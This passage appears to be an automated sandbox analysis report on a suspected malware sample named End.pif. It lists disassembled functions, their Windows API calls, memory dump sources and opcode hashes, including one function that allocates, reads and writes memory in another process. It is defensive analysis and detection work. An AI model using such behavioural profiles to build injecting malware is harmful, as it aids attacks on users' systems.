                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944574835.0000000000A5D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944591414.0000000000A65000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_10_2_990000_End.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: Process$MessageSend$Memory$AllocOpenReadThreadVirtualWindowWrite
                                                                                                                                                                                                                                  • String ID: @
                                                                                                                                                                                                                                  • API String ID: 4150878124-2766056989
                                                                                                                                                                                                                                  • Opcode ID: 3143ee15dd4091672258d9913b336e01a59c365fe0453774a28f1048ff8c1eff
                                                                                                                                                                                                                                  • Instruction ID: d772f52e36e15c7ec8ce007843d19e83817a4446429590231f08b12a287ee896
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 3143ee15dd4091672258d9913b336e01a59c365fe0453774a28f1048ff8c1eff
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: C2411BB2A0021CAEDB10DFA8CD45BEEBBB8EF45700F108095EA45B7181DB746E45CB61
                                                                                                                                                                                                                                  Function 009C1A9E Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 115COMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • GetModuleFileNameW.KERNEL32(00000000,C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1181\End.pif,00000104), ref: 009C1AD9
                                                                                                                                                                                                                                  • _free.LIBCMT ref: 009C1BA4
                                                                                                                                                                                                                                  • _free.LIBCMT ref: 009C1BAE
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000A.00000002.1944338699.0000000000991000.00000020.00000001.01000000.00000005.sdmp, Offset: 00990000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944319545.0000000000990000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944388813.0000000000A2D000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944388813.0000000000A53000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944574835.0000000000A5D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944591414.0000000000A65000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_10_2_990000_End.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: _free$FileModuleName
                                                                                                                                                                                                                                  • String ID: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1181\End.pif
                                                                                                                                                                                                                                  • API String ID: 2506810119-3675057497
                                                                                                                                                                                                                                  • Opcode ID: 0617125778d83d063d2ba38b068bd27f35365a5597ea35ff7d46d4674316e177
                                                                                                                                                                                                                                  • Instruction ID: c61f250d64246d6d013a77f6e6a989c88b143a4ed309a6c39e38cbe85b44dd6c
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 0617125778d83d063d2ba38b068bd27f35365a5597ea35ff7d46d4674316e177
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 10318671E40218AFDB21DF99DC81F9EBBFCEF85710B1041AAE40497256E6704E41CB96
                                                                                                                                                                                                                                  Function 009FCB28 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 114windowCOMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • GetMenuItemInfoW.USER32(00000004,00000000,00000000,?), ref: 009FCBB1
                                                                                                                                                                                                                                  • DeleteMenu.USER32(?,00000007,00000000), ref: 009FCBF7
                                                                                                                                                                                                                                  • DeleteMenu.USER32(?,00000000,00000000,?,00000000,00000000,00A629C0,019B5780), ref: 009FCC40
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000A.00000002.1944338699.0000000000991000.00000020.00000001.01000000.00000005.sdmp, Offset: 00990000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944319545.0000000000990000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944388813.0000000000A2D000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944388813.0000000000A53000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944574835.0000000000A5D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944591414.0000000000A65000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_10_2_990000_End.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: Menu$Delete$InfoItem
                                                                                                                                                                                                                                  • String ID: 0
                                                                                                                                                                                                                                  • API String ID: 135850232-4108050209
                                                                                                                                                                                                                                  • Opcode ID: 16321a9fd7bd9801b19df295905235d8ee3c891b09e23fd61e05898253a96921
                                                                                                                                                                                                                                  • Instruction ID: a669bf3cd1eb390430b8bf8db729996227bb3181aae1798f364b776fc049f020
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 16321a9fd7bd9801b19df295905235d8ee3c891b09e23fd61e05898253a96921
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 3541D4B120430A9FD720DF24DA85B7AB7E8EF85714F148A1DF6A9972D1C730E904CB52
                                                                                                                                                                                                                                  Function 00A24EB4 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 106COMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000013,?,?,SysTreeView32,00A2DCD0,00000000,?,?,?,?), ref: 00A24F48
                                                                                                                                                                                                                                  • GetWindowLongW.USER32 ref: 00A24F65
                                                                                                                                                                                                                                  • SetWindowLongW.USER32(?,000000F0,00000000), ref: 00A24F75
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000A.00000002.1944338699.0000000000991000.00000020.00000001.01000000.00000005.sdmp, Offset: 00990000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944319545.0000000000990000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944388813.0000000000A2D000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944388813.0000000000A53000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944574835.0000000000A5D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944591414.0000000000A65000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_10_2_990000_End.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: Window$Long
                                                                                                                                                                                                                                  • String ID: SysTreeView32
                                                                                                                                                                                                                                  • API String ID: 847901565-1698111956
                                                                                                                                                                                                                                  • Opcode ID: 37ca7d53f0c9a7c8699fe7098a7f416f91f455ea8da4e095a8da9e629149c6f2
                                                                                                                                                                                                                                  • Instruction ID: 6501fe151c9ea4c40440bcf92e1c6da8c67bdc40e8cf6189777a334ff1de2c00
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 37ca7d53f0c9a7c8699fe7098a7f416f91f455ea8da4e095a8da9e629149c6f2
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: D7319C31214215AFEB208F7CEC45BEA7BA9EB48734F214724F979A21E0DB70AC519B50
                                                                                                                                                                                                                                  Function 00A13AAB Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 90networkCOMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                    • Part of subcall function 00A13DB8: WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,00000000,00000000,00000000,?,?,?,?,?,00A13AD4,?,?), ref: 00A13DD5
                                                                                                                                                                                                                                  • inet_addr.WSOCK32(?,?,?,?,?,00000000), ref: 00A13AD7
                                                                                                                                                                                                                                  • _wcslen.LIBCMT ref: 00A13AF8
                                                                                                                                                                                                                                  • htons.WSOCK32(00000000,?,?,00000000), ref: 00A13B63
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000A.00000002.1944338699.0000000000991000.00000020.00000001.01000000.00000005.sdmp, Offset: 00990000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944319545.0000000000990000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944388813.0000000000A2D000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944388813.0000000000A53000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944574835.0000000000A5D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944591414.0000000000A65000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_10_2_990000_End.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: ByteCharMultiWide_wcslenhtonsinet_addr
                                                                                                                                                                                                                                  • String ID: 255.255.255.255
                                                                                                                                                                                                                                  • API String ID: 946324512-2422070025
                                                                                                                                                                                                                                  • Opcode ID: 253edb67f80199cdede52c778db1a2d1352527b24dbf07bcda50cba48f5e23ac
                                                                                                                                                                                                                                  • Instruction ID: 92186137b5983f46eb425fd3033a7a6fa681631a7b9cde6255ff85c870bc6068
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 253edb67f80199cdede52c778db1a2d1352527b24dbf07bcda50cba48f5e23ac
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 4231A17A60C2019FCF10CF68C585EE97BB1EF55324F248199E8168B392E771EE86C760
                                                                                                                                                                                                                                  Function 00A24954 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 89windowCOMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • SendMessageW.USER32(00000000,00001009,00000000,?), ref: 00A249DC
                                                                                                                                                                                                                                  • SetWindowPos.USER32(?,00000000,?,?,?,?,00000004), ref: 00A249F0
                                                                                                                                                                                                                                  • SendMessageW.USER32(?,00001002,00000000,?), ref: 00A24A14
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000A.00000002.1944338699.0000000000991000.00000020.00000001.01000000.00000005.sdmp, Offset: 00990000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944319545.0000000000990000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944388813.0000000000A2D000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944388813.0000000000A53000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944574835.0000000000A5D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944591414.0000000000A65000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_10_2_990000_End.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: MessageSend$Window
                                                                                                                                                                                                                                  • String ID: SysMonthCal32
                                                                                                                                                                                                                                  • API String ID: 2326795674-1439706946
                                                                                                                                                                                                                                  • Opcode ID: b10b5f665623a98816ce2cf3eb0038d599b7e24c1b2283996494b85f2dd013c3
                                                                                                                                                                                                                                  • Instruction ID: 43a2a88363d134aaeee38dc8e229b31cfd8c80556c9f49f4305f6635d6940d89
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: b10b5f665623a98816ce2cf3eb0038d599b7e24c1b2283996494b85f2dd013c3
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: C521BF32610229BBDF11CF98DC42FEB3B79EF48714F110224FE156B190DAB5E8969B90
                                                                                                                                                                                                                                  Function 00A250F1 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 87windowCOMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • SendMessageW.USER32(00000000,00000469,?,00000000), ref: 00A251A3
                                                                                                                                                                                                                                  • SendMessageW.USER32(00000000,00000465,00000000,80017FFF), ref: 00A251B1
                                                                                                                                                                                                                                  • DestroyWindow.USER32(00000000,00000000,?,?,?,00000000,msctls_updown32,00000000,00000000,00000000,00000000,00000000,00000000,?,?,00000000), ref: 00A251B8
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000A.00000002.1944338699.0000000000991000.00000020.00000001.01000000.00000005.sdmp, Offset: 00990000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944319545.0000000000990000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944388813.0000000000A2D000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944388813.0000000000A53000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944574835.0000000000A5D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944591414.0000000000A65000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_10_2_990000_End.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: MessageSend$DestroyWindow
                                                                                                                                                                                                                                  • String ID: msctls_updown32
                                                                                                                                                                                                                                  • API String ID: 4014797782-2298589950
                                                                                                                                                                                                                                  • Opcode ID: a470ff1afdf09049e855a1ae4299b92a49751600c351b5c9be8f1f0a83b02e25
                                                                                                                                                                                                                                  • Instruction ID: 1729ee8d76b62aea9a4f9e5525a7823415d30844b87d04893ac82da8c3fd4925
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: a470ff1afdf09049e855a1ae4299b92a49751600c351b5c9be8f1f0a83b02e25
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: CE2151B5600659AFDB10DF68DC81EB637ADFF9A364B040159F90497361CB70EC52CBA0
                                                                                                                                                                                                                                  Function 00A24253 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 84windowCOMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • SendMessageW.USER32(00000000,00000180,00000000,?), ref: 00A242DC
                                                                                                                                                                                                                                  • SendMessageW.USER32(?,00000186,00000000,00000000), ref: 00A242EC
                                                                                                                                                                                                                                  • MoveWindow.USER32(00000000,?,?,?,?,00000000,?,?,Listbox,00000000,00000000,?,?,?,?,?), ref: 00A24312
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000A.00000002.1944338699.0000000000991000.00000020.00000001.01000000.00000005.sdmp, Offset: 00990000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944319545.0000000000990000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944388813.0000000000A2D000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944388813.0000000000A53000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944574835.0000000000A5D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944591414.0000000000A65000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_10_2_990000_End.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: MessageSend$MoveWindow
                                                                                                                                                                                                                                  • String ID: Listbox
                                                                                                                                                                                                                                  • API String ID: 3315199576-2633736733
                                                                                                                                                                                                                                  • Opcode ID: 5bd38fa6efa6fe0c782b5b91b1e3f57eedab85ed387d95c7f46fae6dd7c68854
                                                                                                                                                                                                                                  • Instruction ID: ad4c807e81c08227dfc38a31640290858610b5f01d82ac7b1752a913512260e4
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 5bd38fa6efa6fe0c782b5b91b1e3f57eedab85ed387d95c7f46fae6dd7c68854
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: DC217F32614128BBEB11CF99DC85FEB3B6EEB89754F118124F9059B190CA759C528BA0
                                                                                                                                                                                                                                  Function 00A05439 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 78COMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • SetErrorMode.KERNEL32(00000001), ref: 00A0544D
                                                                                                                                                                                                                                  • GetVolumeInformationW.KERNEL32(?,?,00007FFF,?,00000000,00000000,00000000,00000000), ref: 00A054A1
                                                                                                                                                                                                                                  • SetErrorMode.KERNEL32(00000000,?,?,00A2DCD0), ref: 00A05515
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000A.00000002.1944338699.0000000000991000.00000020.00000001.01000000.00000005.sdmp, Offset: 00990000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944319545.0000000000990000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944388813.0000000000A2D000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944388813.0000000000A53000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944574835.0000000000A5D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944591414.0000000000A65000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_10_2_990000_End.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: ErrorMode$InformationVolume
                                                                                                                                                                                                                                  • String ID: %lu
                                                                                                                                                                                                                                  • API String ID: 2507767853-685833217
                                                                                                                                                                                                                                  • Opcode ID: 2bae53a596e7dd2560053fe6826e50a887705b9fe0202d6e1dc6c282e7804fd4
                                                                                                                                                                                                                                  • Instruction ID: ea5c51cd0af04be989d9b0b24f629ec0d7505a1ca0419677945b2d6518e314c0
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 2bae53a596e7dd2560053fe6826e50a887705b9fe0202d6e1dc6c282e7804fd4
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 10316170A00208AFDB10DF68D885EAA77F9EF45304F1440A5F909DB262DB71EE46CB61
                                                                                                                                                                                                                                  Function 00A24C89 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 67windowCOMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • SendMessageW.USER32(00000000,00000405,00000000,00000000), ref: 00A24CED
                                                                                                                                                                                                                                  • SendMessageW.USER32(?,00000406,00000000,00640000), ref: 00A24D02
                                                                                                                                                                                                                                  • SendMessageW.USER32(?,00000414,0000000A,00000000), ref: 00A24D0F
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000A.00000002.1944338699.0000000000991000.00000020.00000001.01000000.00000005.sdmp, Offset: 00990000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944319545.0000000000990000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944388813.0000000000A2D000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944388813.0000000000A53000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944574835.0000000000A5D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944591414.0000000000A65000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_10_2_990000_End.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: MessageSend
                                                                                                                                                                                                                                  • String ID: msctls_trackbar32
                                                                                                                                                                                                                                  • API String ID: 3850602802-1010561917
                                                                                                                                                                                                                                  • Opcode ID: 6d8f3f7bb036dd0b20ec94abee75258d14e1ee4b125bb3c2b1f6f5bb09fd86aa
                                                                                                                                                                                                                                  • Instruction ID: 40c2e243135391180b3f4ba4c69c2c3e70e1efd32dfcfd5bbb5589399db7f3a1
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 6d8f3f7bb036dd0b20ec94abee75258d14e1ee4b125bb3c2b1f6f5bb09fd86aa
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 32110271240258BEEF219F6DDC06FAB3BACEF89B64F110524FE55E20A0C671DC619B20
                                                                                                                                                                                                                                  Function 009F389E Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 67windowCOMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                    • Part of subcall function 00998577: _wcslen.LIBCMT ref: 0099858A
                                                                                                                                                                                                                                    • Part of subcall function 009F36F4: SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,?), ref: 009F3712
                                                                                                                                                                                                                                    • Part of subcall function 009F36F4: GetWindowThreadProcessId.USER32(?,00000000), ref: 009F3723
                                                                                                                                                                                                                                    • Part of subcall function 009F36F4: GetCurrentThreadId.KERNEL32 ref: 009F372A
                                                                                                                                                                                                                                    • Part of subcall function 009F36F4: AttachThreadInput.USER32(00000000,?,00000000,00000000), ref: 009F3731
                                                                                                                                                                                                                                  • GetFocus.USER32 ref: 009F38C4
                                                                                                                                                                                                                                    • Part of subcall function 009F373B: GetParent.USER32(00000000), ref: 009F3746
                                                                                                                                                                                                                                  • GetClassNameW.USER32(?,?,00000100), ref: 009F390F
                                                                                                                                                                                                                                  • EnumChildWindows.USER32(?,009F3987), ref: 009F3937
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000A.00000002.1944338699.0000000000991000.00000020.00000001.01000000.00000005.sdmp, Offset: 00990000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944319545.0000000000990000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944388813.0000000000A2D000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944388813.0000000000A53000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944574835.0000000000A5D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944591414.0000000000A65000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_10_2_990000_End.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: Thread$AttachChildClassCurrentEnumFocusInputMessageNameParentProcessSendTimeoutWindowWindows_wcslen
                                                                                                                                                                                                                                  • String ID: %s%d
                                                                                                                                                                                                                                  • API String ID: 1272988791-1110647743
                                                                                                                                                                                                                                  • Opcode ID: bbc92d7a70612588f6f5d38eeb0780fbb6c777b796b661ea3410654e14eb186a
                                                                                                                                                                                                                                  • Instruction ID: 0d0949fdea39e28d7049bf9befb4ce2b79969eee7d5a765cd9ac8a49402d0ac5
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: bbc92d7a70612588f6f5d38eeb0780fbb6c777b796b661ea3410654e14eb186a
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 2711A871600209ABDF11BF749C85BFE77AAAFD4304F048079BE199B252DE74594ACB20
                                                                                                                                                                                                                                  Function 00A26321 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 47windowCOMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • GetMenuItemInfoW.USER32(?,?,?,00000030), ref: 00A26360
                                                                                                                                                                                                                                  • SetMenuItemInfoW.USER32(?,?,?,00000030), ref: 00A2638D
                                                                                                                                                                                                                                  • DrawMenuBar.USER32(?), ref: 00A2639C
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000A.00000002.1944338699.0000000000991000.00000020.00000001.01000000.00000005.sdmp, Offset: 00990000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944319545.0000000000990000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944388813.0000000000A2D000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944388813.0000000000A53000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944574835.0000000000A5D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944591414.0000000000A65000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_10_2_990000_End.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: Menu$InfoItem$Draw
                                                                                                                                                                                                                                  • String ID: 0
                                                                                                                                                                                                                                  • API String ID: 3227129158-4108050209
                                                                                                                                                                                                                                  • Opcode ID: c21e152e21fc1fa823964061c6af6adeddad210db822f70ee9d0f6d470ca41a5
                                                                                                                                                                                                                                  • Instruction ID: 6322533461e8799d32f0402ce4ab433cab7f1e2c939e578b4427e1dc3e96fc4a
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: c21e152e21fc1fa823964061c6af6adeddad210db822f70ee9d0f6d470ca41a5
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 1801C031504228AFDB24DF58EC84BEE7BB4FF84314F1080A9E809DA150CB308A82EF20
                                                                                                                                                                                                                                  Function 009F096F Relevance: 6.3, APIs: 4, Instructions: 322COMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000A.00000002.1944338699.0000000000991000.00000020.00000001.01000000.00000005.sdmp, Offset: 00990000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944319545.0000000000990000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944388813.0000000000A2D000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944388813.0000000000A53000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944574835.0000000000A5D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944591414.0000000000A65000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_10_2_990000_End.jbxd
                                                                                                                                                                                                                                  Similarity
